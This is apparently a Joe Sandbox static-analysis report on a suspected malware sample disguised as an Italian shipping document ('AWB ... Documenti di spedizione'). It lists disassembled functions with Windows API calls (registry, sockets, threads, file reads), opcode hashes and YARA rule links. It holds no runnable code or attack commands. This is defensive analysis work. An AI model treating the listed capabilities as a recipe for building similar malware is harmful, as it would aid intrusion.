                        Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                        • API String ID: 1038674560-2734436370
                        • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                        • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                        • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                        • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                        Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                        • __lock.LIBCMT ref: 00417981
                          • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                          • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                          • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                        • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                        • __lock.LIBCMT ref: 004179A2
                        • ___addlocaleref.LIBCMT ref: 004179C0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                        • String ID: KERNEL32.DLL$pI
                        • API String ID: 637971194-197072765
                        • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                        • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                        • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                        • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                        Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove$_malloc
                        • String ID:
                        • API String ID: 1938898002-0
                        • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                        • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                        • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                        • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                        Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                        Download Yara Rule
                        APIs
                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                        • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                        • _memmove.LIBCMT ref: 0044B555
                        • _memmove.LIBCMT ref: 0044B578
                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                        • String ID:
                        • API String ID: 2737351978-0
                        • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                        • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                        • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                        • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                        Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                        Download Yara Rule
                        APIs
                        • ___set_flsgetvalue.LIBCMT ref: 0041523A
                        • __calloc_crt.LIBCMT ref: 00415246
                        • __getptd.LIBCMT ref: 00415253
                        • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                        • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                        • _free.LIBCMT ref: 0041529E
                        • __dosmaperr.LIBCMT ref: 004152A9
                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                        • String ID:
                        • API String ID: 3638380555-0
                        • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                        • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                        • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                        • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                        Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 0046C96E
                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Variant$Copy$ClearErrorInitLast
                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                        • API String ID: 3207048006-625585964
                        • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                        • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                        • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                        • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                        Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                        • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                        • gethostbyname.WSOCK32(?), ref: 004655A6
                        • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                        • _memmove.LIBCMT ref: 004656CA
                        • GlobalFree.KERNEL32(00000000), ref: 0046575C
                        • WSACleanup.WSOCK32 ref: 00465762
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                        • String ID:
                        • API String ID: 2945290962-0
                        • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                        • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                        • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                        • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                        Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemMetrics.USER32(0000000F), ref: 00440527
                        • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                        • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                        • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                        • String ID:
                        • API String ID: 1457242333-0
                        • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                        • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                        • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                        • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                        Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ConnectRegistry_memmove_wcslen
                        • String ID:
                        • API String ID: 15295421-0
                        • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                        • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                        • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                        • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                        Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        • _wcstok.LIBCMT ref: 004675B2
                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                        • _wcscpy.LIBCMT ref: 00467641
                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                        • _wcslen.LIBCMT ref: 00467793
                        • _wcslen.LIBCMT ref: 004677BD
                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                        • String ID: X
                        • API String ID: 780548581-3081909835
                        • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                        • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                        • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                        • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                        Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                        • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                        • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                        • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                        • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                        • CloseFigure.GDI32(?), ref: 0044751F
                        • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                        • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                        • String ID:
                        • API String ID: 4082120231-0
                        • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                        • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                        • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                        • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                        Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                        • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                        • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                        • String ID:
                        • API String ID: 2027346449-0
                        • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                        • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                        • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                        • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                        Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                        • GetMenu.USER32 ref: 0047A703
                        • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                        • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                        • _wcslen.LIBCMT ref: 0047A79E
                        • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                        • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                        • String ID:
                        • API String ID: 3257027151-0
                        • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                        • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                        • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                        • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                        Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                        Download Yara Rule
                        APIs
                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
